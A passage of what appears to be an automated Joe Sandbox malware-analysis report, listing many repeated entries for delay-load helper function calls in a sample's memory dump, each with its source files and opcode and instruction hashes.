                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: ebd7f5487998192a3d6dfafd57f73f0326e3827d1d16c459f4e35b0478a20dc2
                                                                                                            • Instruction ID: 4edc2b211c1d517db0808f51904492a1d50d3363f06a74a664135d2c00720351
                                                                                                            • Opcode Fuzzy Hash: ebd7f5487998192a3d6dfafd57f73f0326e3827d1d16c459f4e35b0478a20dc2
                                                                                                            • Instruction Fuzzy Hash: 13B09281258145BC224461096E02C3A0118C091B18320422BB604C8280A8400C442436
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: b499c5a94cec49c7da0073d93b9165b5ee182b6e0e1991888a9eb03aa6ba4073
                                                                                                            • Instruction ID: d901c0898de7032e455e40ebe96c451dd669aa2411eecfdaddb51fbf25402681
                                                                                                            • Opcode Fuzzy Hash: b499c5a94cec49c7da0073d93b9165b5ee182b6e0e1991888a9eb03aa6ba4073
                                                                                                            • Instruction Fuzzy Hash: 97B012C135C045BC310431293E06C3B011CC0D1F18330403FF610CC6C1B8400D043432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: b89f841d95c0b845ab0ee70274fb06b173231146a4e6278e093c9facdfcd58fd
                                                                                                            • Instruction ID: d9369021ef2d72499ab7fe389e816bde34870684eb8b5b518bcc91bac16c495e
                                                                                                            • Opcode Fuzzy Hash: b89f841d95c0b845ab0ee70274fb06b173231146a4e6278e093c9facdfcd58fd
                                                                                                            • Instruction Fuzzy Hash: DEB09281358085AD214461092E02C3A0518C091B18320802FB604C8280A8400C012432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 1fd10d91d9f9df279b5432b12e151dce663ac2bcb2522751c66f93049d73bb21
                                                                                                            • Instruction ID: 1d458e69cf1336875d8c97b457d07dbc85e014781e2114fdbf794699b44a57f4
                                                                                                            • Opcode Fuzzy Hash: 1fd10d91d9f9df279b5432b12e151dce663ac2bcb2522751c66f93049d73bb21
                                                                                                            • Instruction Fuzzy Hash: 62B09281258045BE214461092E02D3A0118C091B18320412FF604C8280A8400C002432
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 747564b174e68dd800eef8f1b377c566f9e2ced93376a546241ba11ada5c78d7
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: 747564b174e68dd800eef8f1b377c566f9e2ced93376a546241ba11ada5c78d7
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: a9ebd94dde72b00b745ca18f9542677e462782ac7f9ec5fa6b636d3c768642c1
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: a9ebd94dde72b00b745ca18f9542677e462782ac7f9ec5fa6b636d3c768642c1
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 7ae3ccf22d12ad5e4eb9a37b793cd4a2d225eac0290722713f2d1c9f2d3c5375
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: 7ae3ccf22d12ad5e4eb9a37b793cd4a2d225eac0290722713f2d1c9f2d3c5375
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 9834e53d724afc10a92121470adf7417b088ec847316550bb4aef95d13dd5ce9
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: 9834e53d724afc10a92121470adf7417b088ec847316550bb4aef95d13dd5ce9
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 78a0318e684395c565cef246eda468dae07e002fb19effc05d909ecc40e5f090
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: 78a0318e684395c565cef246eda468dae07e002fb19effc05d909ecc40e5f090
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: db1babc88a72de3b1b47c92c3561b2fb04d8ca18855abf0dd7b7acb3c0d012f1
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: db1babc88a72de3b1b47c92c3561b2fb04d8ca18855abf0dd7b7acb3c0d012f1
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: ae7f872bf747292a1f828fd7a2c63f56bdc58d47ca453709db728b04de00d283
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: ae7f872bf747292a1f828fd7a2c63f56bdc58d47ca453709db728b04de00d283
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 97193a326f77bce9efc03ee15bdb9727b12b20b5040ae35b3c6bf82ae5cd26af
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: 97193a326f77bce9efc03ee15bdb9727b12b20b5040ae35b3c6bf82ae5cd26af
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 82d14ec481e3ccc3bd41a4eedaf58dd6af61c082f026ab79437fe6e182af1f28
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: 82d14ec481e3ccc3bd41a4eedaf58dd6af61c082f026ab79437fe6e182af1f28
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: e7f9d28a080d01f69019e9ef4c135bc2547f33b5f416d45fc74b6eeb14a05eb8
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: e7f9d28a080d01f69019e9ef4c135bc2547f33b5f416d45fc74b6eeb14a05eb8
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
